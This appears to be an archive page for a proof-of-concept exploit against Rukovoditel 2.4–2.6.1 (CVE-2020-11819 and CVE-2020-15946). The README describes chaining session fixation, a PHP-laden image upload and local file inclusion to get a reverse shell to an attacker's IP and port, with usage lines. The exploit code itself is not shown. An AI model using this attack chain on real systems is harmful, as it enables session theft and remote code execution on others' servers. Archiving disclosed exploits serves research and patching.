Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2020-11819 PoC — Rukovoditel 输入验证错误漏洞

Source
Associated Vulnerability
Title:Rukovoditel 输入验证错误漏洞 (CVE-2020-11819)
Description:Rukovoditel是Rukovoditel团队的一套基于Web的开源项目管理软件。该软件具有项目管理、客户关系管理等功能。 Rukovoditel 2.5.2版本中存在输入验证错误漏洞。攻击者可利用该漏洞执行命令。
Description
Proof of concept for CVE-2020-11819 and CVE-2020-15946
Readme
# PoC-RCE-Rukovoditel
Proof of concept for CVE-2020-11819 and CVE-2020-15946. Tested on Rukovoditel 2.4.x, 2.5.x and 2.6.1
 
# Description:
This exploit has two modes of execution, using the session fixation vulnerability (CVE-2020-15946) or using the access credentials of any account under any profile. 
With the --type L option, this script will create a malicious link, if the link is accessed in a browser by the victim, an arbitrary session identifier will be set that will be used to steal their session after uploading an image with PHP content on their photo profile, and then use local file include (CVE-2020-11819) to get a nice reverse shell or, with the options --type C -u <username> -p <password> you can provide credentials, load the image with PHP content and use local file inclusion (CVE-2020-11819) to achieve the execution of code. 

Protip: remember to check if the registration module is enabled ;)

# Usage
exploit.py -t <target> -a L --ip attacker IP --port attacker port [options]
exploit.py -t <target> -a C -u <username> -p <password> --ip attacker IP --port attacker port [options]

Post-authenticate RCE for rukovoditel, script version 1.0

optional arguments:  
-h, --help            show this help message and exit  
-t URL, --target URL  URL/Full path to CMS Rukovoditel http://url/path/to/cms/  
-u USER, --user USER  Username for authentication  
-p PASSWORD, --password PASSWORD Password for authentication  
-a TYPE, --type TYPE  Use -a L to generate the link and steal the session or use -a C if you have access credentials to the web application  
--ip IP_ATTACKER      IP attacker for reverse shell!  
--port PORT_ATTACKER  Port for reverse shell connection  
--proxy PROXY         Setup http proxy for debbugin http://127.0.0.1:8080  
File Snapshot

[4.0K] /data/pocs/d19837a86a79eac9cb7fe4984c0c9126f6f81975 ├── [ 17K] exploit.py └── [1.7K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.